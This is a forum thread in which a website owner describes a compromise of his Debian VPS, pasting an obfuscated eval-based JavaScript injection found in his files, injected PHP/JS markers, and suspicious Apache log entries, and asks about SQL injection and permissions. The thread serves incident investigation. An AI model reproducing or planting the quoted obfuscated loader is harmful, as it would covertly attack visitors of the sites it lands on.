tommyboy123x

Damn, thank you so much dark.... I didn't realize how out of touch I was. I also wanted to give an update here - the attacker has attempted two other times to add some obfusicated javascirpt code in the js files... this is becoming a serious problem. try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e85877e2e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e85877e3c8180712e4b2e357682827e483d3d82738182403c767d818288773c717d7b3d777b753d44547085507c62523c7e767e3549182e85877e3c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e85877e3c8182877a733c707d807273802e4b2e353e3549182e85877e3c8182877a733c7673777576822e4b2e35477e863549182e85877e3c8182877a733c85777282762e4b2e35457e863549182e85877e3c8182877a733c7a7374822e4b2e353f7e863549182e85877e3c8182877a733c827d7e2e4b2e353f7e86354918182e77742e362f727d71837b737c823c757382537a737b737c8250875772363585877e3537372e89182e727d71837b737c823c858077827336354a7277842e77724b6a3585877e6a354c4a3d7277844c353749182e727d71837b737c823c757382537a737b737c8250875772363585877e35373c6f7e7e737c725176777a723685877e3749182e8b188b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e89182e846f802e827d726f872e4b2e7c73852e526f8273363749182e846f802e73867e7780732e4b2e7c73852e526f8273363749182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f49182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f87813749182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a837337182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e30303749188b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e89182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e3749182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f49182e77742e362e362e2f81826f80822e372e3434182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e37182e89182e80738283807c2e7c837a7a49182e8b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a49182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e3749182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); How are you testing these injections? Are you convinced this is the cause of these attacks? When I try something like "X' or 1=1" (without the quotes) I can't get it to work how I would expect. I'll be back in a few days with the changes.

Could you elaborate? As far as I'm aware, there is no way to add an sql injection on this form... it does pass the data without mysql_real_escape_string but it also converts it into an md5 hash before adding to an SQL line. I also believe this may have been possible because of my lax permission set. A lot of these files were 775 by default, and I think 640 is really what I want. Could this have been the cause? I still can't find the PHP logs, can anyone tell me where to find clues that can help me piece together what happened? It is a debian squeeze environment.

It'll be a few weeks before things are fully operational again, and I don't want to make the same mistake by doing my security checks before I'm finished (and creating these openings). I have a hunch it was actually an exploit related to an on-site chat, which writes a string to a file to update the "last edited" time. It is a "comet implementation" based on http://www.zeitoun.net/articles/comet_and_php/start. I believe the attacker may have used this to gain write permissions. I also got lazy and made my ftp account the same group as apache (and the owner of ALL web files) which may have contributed to this. Anyways, login.php should be fixed for this particular exploit. I'll keep this tab open and post in a couple weeks when I do a complete analysis.

Thanks for the help - I thought login.php used mysql_real_escape_string. A few years back I went through pretty carefully looking for XSS possibilities and other things like that, this must have been updated since then. I'll assume this was an SQL injection of some kind and keep my eyes out for other exploit possiblities. Thanks!

I have this in my apache logs [Fri Jul 26 23:47:25 2013] [error] [client 96.254.171.2] script '/var/www/azenv.php' not found or unable to stat as well as a few other attempted fails at viewing directories and files that don't exist (such as /etc/apache2/htdocs and /var/www/config) In the access log I have this: 96.254.171.2 - - [21/Jul/2013:01:30:02 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT ws NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)" 96.254.171.2 - - [26/Jul/2013:07:56:15 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9$ 77.73.5.166 - - [26/Jul/2013:07:56:32 +0000] "GET /wR38jPHK.gif HTTP/1.0" 200 262 "-" "Mozilla/5.0(Windows NT 5.0) AppleWebKit/5332 (KHTML, like Gecko) Chrome/13.0.813$ Still trying to track down my php error logs based on my php.ini files, I'll edit if found but is any of this suspicious to you?

I'm not sure this is the right place to post this, but here it goes... There seems to have been something that happened on July 26th - I haven't touched these files in months, yet there's this code added in the most common PHP files (like index.php, login.php) and EVERY javascript file php is as follows: <? #0f2490# echo('<img src=\"http://localhost/\" >'); #/0f2490# ?> and on all my javascript files: /*0f2490*/ document.write('<img src="http://localhost/" >'); /*0f2490*/ The exact same issue as this guy (on the same date) - http://translate.google.com/translate?hl=en&sl=de&u=http://www.awardcafe.de/printthread.php%3Ftid%3D1513&prev=/search%3Fq%3D0f2490%2Blocalhost%2B0f2490%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26channel%3Dfflb%26biw%3D1162%26bih%3D581 Was my server compromised? What steps can I take to ensure this doesn't happen again? Its on a VPS I manage, so I wouldn't be too surprised if I ****ed something up, let me know what (if any) access logs you think may be relevant or even where to begin with this problem. Thanks!